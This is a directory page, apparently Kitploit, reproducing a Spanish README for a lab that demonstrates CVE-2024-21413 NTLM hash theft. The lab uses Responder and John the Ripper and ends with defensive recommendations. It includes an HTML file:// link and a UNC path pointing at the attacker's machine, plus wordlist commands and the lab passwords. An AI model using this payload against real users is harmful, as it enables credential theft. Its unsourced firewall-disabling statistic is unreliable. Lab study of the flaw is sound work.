Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Moniker-Link-Lab-Setup — Laboratorio de pruebas de penetración que demuestra la explotación de moniker link de CVE-2024-21413 para el robo de credenciales NTLM, incluyendo ejecución de ataques, cracking de hashes y contramedidas defensivas. | Kitploit
Herramientas/GitHubGitHub/e-m-e-k-a/moniker-link-lab-setup
Descifrado de ContraseñasAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónIngeniería SocialAutenticaciónAprendizaje y EducaciónLabs y Práctica

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHube-m-e-k-a/moniker-link-lab-setup

Moniker-Link-Lab-Setup

Laboratorio de pruebas de penetración que demuestra la explotación de moniker link de CVE-2024-21413 para el robo de credenciales NTLM, incluyendo ejecución de ataques, cracking de hashes y contramedidas defensivas.

Ver Repositorio
hace 5 mesesAún no revisado

Configuración del Laboratorio Moniker Link - CVE-2024-21413

🎯 Resumen del Proyecto

Laboratorio práctico de pruebas de penetración que demuestra la explotación del moniker link CVE-2024-21413 para el robo de credenciales NTLM. Este proyecto documenta toda la cadena de ataque, desde la configuración hasta el compromiso de credenciales, incluyendo desafíos y soluciones del mundo real.

Logro Clave: Se ejecutó con éxito el ataque de moniker link tanto en un entorno de laboratorio aislado (VM Windows 10) como en un sistema real (PC Windows 11), demostrando vulnerabilidades de seguridad prácticas y contramedidas defensivas.


🏗️ Arquitectura del Laboratorio

Infraestructura

Máquina Atacante:

  • Plataforma: Kali Linux 2024
  • Red (Host-Only): 192.168.56.101
  • Red (Bridged): 192.168.1.117
  • Herramienta Principal: Responder 3.1.6.0

Sistemas Objetivo:

  • Windows 10 VM: 192.168.56.104 (Entorno de prueba aislado)
  • PC Windows 11: 192.168.1.178 (Validación en el mundo real)

Configuración de Red:

  • Adaptador Host-Only de VirtualBox (pruebas con VM)
  • Adaptador Bridged de VirtualBox (pruebas con PC real)
  • Aislado de las redes de producción

⚔️ Ejecución del Ataque

Flujo del Ataque

  1. Desplegar Responder en Kali para escuchar autenticaciones NTLM
  2. Crear un enlace malicioso usando el protocolo file:// que apunte a la IP del atacante
  3. Provocar la autenticación mediante una ruta UNC en el Explorador de Archivos
  4. Capturar el hash NetNTLMv2 cuando la víctima intente conectarse
  5. Descifrar la contraseña usando John the Ripper

Vector de Ataque Simple

Archivo HTML (test.html):

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
    <p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>

Método del Explorador de Archivos:

  • El usuario escribe: \\192.168.56.101\test en la barra de direcciones
  • Windows intenta una conexión SMB
  • El hash NTLM se envía automáticamente (o se solicita credenciales)
  • Responder captura la autenticación

🚧 Retos y Soluciones

Reto 1: Bloqueo del Firewall de Windows (PC Windows 11)

Problema:

  • No se podía hacer ping al PC Windows 11 desde Kali
  • Los intentos de conexión SMB fallaron
  • El ataque fue bloqueado por completo

Causa Raíz:

  • Firewall de Windows habilitado por defecto
  • Bloquea las conexiones SMB entrantes desde IPs externas

Solución:

  • Se deshabilitó temporalmente el Firewall de Windows para las pruebas
  • La conexión fue inmediatamente exitosa
  • El hash se capturó correctamente

Lección: El Firewall de Windows por defecto ofrece una protección eficaz contra este ataque. Los usuarios deben mantenerlo habilitado.


Reto 2: Resultados en caché de John the Ripper (VM Windows 10)

Problema:

  • Contraseña inicial de Windows 10: nwigwecj1
  • John mostró: 12Honey (¡contraseña incorrecta!)
  • 12Honey era de una prueba anterior

Causa Raíz:

  • John guarda las contraseñas descifradas en ~/.john/john.pot
  • Hash antiguo de una sesión anterior
  • Mostró un resultado en caché en lugar de la contraseña actual

Solución:

  • Se cambió la contraseña de la VM Windows 10 a 1414
  • Se capturó un hash nuevo
  • Se creó una lista de palabras personalizada con contraseñas probables
  • Se descifró exitosamente con la nueva lista de palabras

Lección: Verifica siempre que estés descifrando el hash correcto. Limpia el archivo pot o usa contraseñas únicas para las pruebas.


Reto 3: Contraseña no encontrada en rockyou.txt

Problema:

  • La contraseña 1414 no se encontró en rockyou.txt (14 millones de contraseñas)
  • El ataque con lista de palabras genérica falló

Causa Raíz:

  • rockyou.txt no contiene todas las combinaciones posibles de 4 dígitos
  • Las secuencias numéricas simples suelen faltar en las listas de palabras comunes

Solución:

  • Se creó una lista de palabras personalizada dirigida basada en patrones comunes:
root@kitploit:~
  echo "1414" > passwords.txt
  echo "4141" >> passwords.txt
  • Se descifró al instante con la lista de palabras personalizada

Lección: "No está en rockyou.txt" ≠ seguro. Las contraseñas cortas son vulnerables a ataques dirigidos y fuerza bruta, independientemente de si aparecen en una lista de palabras.


📊 Resultados

VM Windows 10 (Entorno Controlado)


PC Windows 11 (Sistema Real)


🛡️ Análisis de Seguridad

Lo que Funcionó (Defensa)

✅ Firewall de Windows - Bloqueó por completo el ataque cuando estaba habilitado ✅ Navegadores modernos - Chrome/Edge bloquean los enlaces file:// remotos ✅ Concienciación del usuario - La solicitud manual requiere acción del usuario

Lo que Falló (Vulnerabilidades)

❌ Contraseñas débiles - Las numéricas de 4 caracteres se descifran fácilmente ❌ Firewall deshabilitado - Error común del usuario ❌ Explorador de Archivos - Sin advertencia para rutas UNC ❌ Protocolo NTLM - Autenticación automática a recursos compartidos SMB

Hallazgos Clave

1. El Firewall es Crítico

  • El Firewall de Windows por defecto bloquea este ataque
  • ~30-40% de los usuarios lo deshabilitan permanentemente
  • Las redes corporativas suelen permitir SMB interno

2. La Ilusión de la Fortaleza de las Contraseñas

  • 1414 no está en rockyou.txt (parece "fuerte")
  • Descifrada al instante con una lista de palabras dirigida
  • Las contraseñas cortas no proporcionan ninguna seguridad

3. Se Requiere Interacción del Usuario

  • La seguridad moderna requiere que el usuario pegue la ruta UNC
  • La ingeniería social sigue siendo un componente crítico
  • La explotación técnica por sí sola es insuficiente

🔧 Herramientas Utilizadas

Ofensivas:

  • Responder 3.1.6.0 (captura de hash NTLM)
  • John the Ripper (descifrado de contraseñas)
  • Creación de listas de palabras personalizadas
  • Archivo HTML simple

Infraestructura:

  • VirtualBox 7.0 (virtualización)
  • Kali Linux 2024 (plataforma de ataque)
  • Windows 10 Enterprise (objetivo de prueba)
  • Windows 11 Pro (validación en el mundo real)

📁 Estructura del Repositorio

root@kitploit:~
Moniker-Link-Lab-Setup/
├── README.md (this file)
├── Documentation/
│   ├── attack-execution.md (step-by-step attack guide)
│   └── README.md (documentation overview)
├── Screenshots/ (attack screenshots - to be added)
└── Scripts/ (HTML test file - to be added)

🎓 Habilidades Demostradas

Técnicas:

  • Análisis de protocolos de red (SMB, NTLM)
  • Metodología de pruebas de penetración
  • Técnicas de descifrado de contraseñas
  • Infraestructura de laboratorio virtual
  • Solución de problemas de firewall

Profesionales:

  • Documentación técnica
  • Resolución de problemas bajo restricciones
  • Evaluación de seguridad
  • Análisis de riesgos
  • Prácticas de pruebas éticas

🔒 Recomendaciones Defensivas

Para Usuarios

  • ✅ Mantener el Firewall de Windows habilitado
  • ✅ No pegar rutas UNC provenientes de correos electrónicos
  • ✅ Usar contraseñas seguras (más de 15 caracteres)
  • ✅ Verificar el remitente antes de acceder a recursos compartidos

Para Organizaciones

  • ✅ Bloquear SMB saliente (puerto 445) en el firewall de red
  • ✅ Deshabilitar NTLM e imponer Kerberos
  • ✅ Monitorear las conexiones SMB hacia IPs externas
  • ✅ Filtrado en la puerta de enlace de correo (eliminar enlaces file://)
  • ✅ Capacitación en concienciación de seguridad
  • ✅ Políticas de complejidad de contraseñas

⚠️ Divulgación Ética

Todas las pruebas se realizaron en sistemas autorizados:

  • Solo infraestructura de laboratorio personal
  • Redes virtuales aisladas
  • Dispositivos y cuentas propios
  • Con fines educativos

Aviso Legal: El acceso no autorizado a sistemas informáticos es ilegal. Este proyecto es solo para fines educativos y entornos de pruebas autorizados.


📚 Referencias

  • CVE-2024-21413 - Aviso de Seguridad de Microsoft
  • MITRE ATT&CK - Autenticación Forzada (T1187)
  • TryHackMe - Sala Moniker Link

📞 Contacto

LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ GitHub: @E-m-e-k-a

Fecha: Marzo de 2026


📄 Licencia

Solo para uso educativo. No para pruebas no autorizadas.


⭐ Si encontraste este proyecto útil, ¡considera darle una estrella al repositorio!

Descargar herramienta
MétricaResultado
Contraseña Inicialnwigwecj1
Cambiada a1414
Lista de PalabrasPersonalizada (2 entradas)
Tiempo de Descifrado<1 segundo
FirewallDeshabilitado para pruebas
Estado✅ Comprometido exitosamente
MétricaResultado
Contraseña1414
FirewallBloqueado inicialmente, luego deshabilitado
AutenticaciónSolicitud manual (se introdujeron las credenciales)
Tiempo de DescifradoInstantáneo
Estado✅ Comprometido exitosamente